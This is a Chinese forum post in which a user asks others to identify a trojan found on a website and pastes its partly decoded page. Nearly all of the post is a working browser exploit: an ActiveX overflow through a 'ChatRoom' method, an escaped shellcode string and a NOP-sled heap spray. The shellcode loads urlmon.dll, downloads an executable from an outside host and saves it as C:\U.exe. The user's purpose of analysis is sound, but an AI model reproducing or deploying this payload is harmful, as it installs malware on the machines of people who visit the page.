高手来分析一下,这个是什么马
我在一个网站上发现了第二个 好像在后台运行暴风影音 带隐藏参数 不过偶没运行就是了 估计是利用前些日子暴出的暴风影音漏洞种马的工具
第一个网页第一层是usascii加密
解密后如下 好像还有加密
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>
</head><body>
<script>
document.writeln("<script>");
document.writeln("document.writeln(\"<html><object id=\\\'GentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelV\\\' classid=\\\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\\\"><\\\/object><SCRIPT language=\\\"javascript\\\">var ChenziN=window[\\\"unescape\\\"](\\\"\"+\"%u54EB\"+\"%u758B\"+\"%u8B3C\"+\"%u3574\"+\"%u0378\"+\"%u56F5\"+\"%u768B\"+\"%u0320\"+\"%u33F5\"+\"%u49C9\"+\"%uAD41\"+\"%uDB33\"+\"%u0F36\"+\"%u14BE\"+\"%u3828\"+\"%u74F2\"+\"%uC108\"+\"%u0DCB\"+\"%uDA03\"+\"%uEB40\"+\"%u3BEF\"+\"%u75DF\"+\"%u5EE7\"+\"%u5E8B\"+\"%u0324\"+\"%u66DD\"+\"%u0C8B\"+\"%u8B4B\"+\"%u1C5E\"+\"%uDD03\"+\"%u048B\"+\"%u038B\"+\"%uC3C5\"+\"%u7275\"+\"%u6D6C\"+\"%u6E6F\"+\"%u642E\"+\"%u6C6C\"+\"%u4300\"+\"%u5C3A\"+\"%u2e55\"+\"%u7865\"+\"%u0065\"+\"%uC033\"+\"%u0364\"+\"%u3040\"+\"%u0C78\"+\"%u408B\"+\"%u8B0C\"+\"%u1C70\"+\"%u8BAD\"+\"%u0840\"+\"%u09EB\"+\"%u408B\"+\"%u8D34\"+\"%u7C40\"+\"%u408B\"+\"%u953C\"+\"%u8EBF\"+\"%u0E4E\"+\"%uE8EC\"+\"%uFF84\"+\"%uFFFF\"+\"%uEC83\"+\"%u8304\"+\"%u242C\"+\"%uFF3C\"+\"%u95D0\"+\"%uBF50\"+\"%u1A36\"+\"%u702F\"+\"%u6FE8\"+\"%uFFFF\"+\"%u8BFF\"+\"%u2454\"+\"%u8DFC\"+\"%uBA52\"+\"%uDB33\"+\"%u5353\"+\"%uEB52\"+\"%u5324\"+\"%uD0FF\"+\"%uBF5D\"+\"%uFE98\"+\"%u0E8A\"+\"%u53E8\"+\"%uFFFF\"+\"%u83FF\"+\"%u04EC\"+\"%u2C83\"+\"%u6224\"+\"%uD0FF\"+\"%u7EBF\"+\"%uE2D8\"+\"%uE873\"+\"%uFF40\"+\"%uFFFF\"+\"%uFF52\"+\"%uE8D0\"+\"%uFFD7\"+\"%uFFFF\"+\"%u7468\"+\"%u7074\"+\"%u2F3A\"+\"%u782F\"+\"%u7878\"+\"%u702E\"+\"%u7068\"+\"%u7070\"+\"%u752E\"+\"%u2F73\"+\"%u7777\"+\"%u642F\"+\"%u646F\"+\"%u652E\"+\"%u6578\"+\"%u0000\\\");<\\\/script><SCRIPT language=\\\"javascript\\\">var ChenziNs=\\\"\"+\"%u9090\"+\"%u9090\\\";var qBa=window[\\\"unescape\\\"](ChenziNs);var qBas=0x40000;while(qBa[\\\"length\\\"]<136)qBa+=qBa;qBaVips=qBa[\\\"substring\\\"](0,136);qBaVip=qBa[\\\"substring\\\"](0,qBa[\\\"length\\\"]-136);while(qBaVip[\\\"length\\\"]+136<qBas)qBaVip=qBaVip+qBaVip+qBaVips;okVips=new window[\\\"Array\\\"]();for(x=0;x<300;x++)okVips[x]=qBaVip+ChenziN;var cike=\\\'\\\';while(cike[\\\"length\\\"]<4057)cike=cike+\\\"\\\\\\\\\\\\\\\\\\\";cike=cike+\\\"\\\\\\\";cike=cike+\\\"\\\\\\\";cike=cike+\\\"\\\\\\\";cike=cike+\\\"\\\\\\\\\\\\\\\\\\\";cike=cike+\\\"\\\\\\\\\\\\\\\\\\\";GentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelV[\\\"ChatRoom\\\"](cike);<\\\/script><\\\/html>\");");
document.writeln("<\/script>");
</script?
</body></html>